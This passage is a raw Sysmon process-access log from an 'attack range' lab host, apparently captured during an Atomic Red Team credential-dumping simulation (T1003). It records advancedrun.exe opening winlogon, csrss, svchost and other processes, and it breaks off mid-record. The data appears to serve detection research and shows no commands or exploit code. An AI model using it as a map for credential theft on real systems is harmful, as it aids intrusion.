10341000x80000000000000003967272Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967270Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967269Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967268Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967267Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967262Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967261Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003967260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 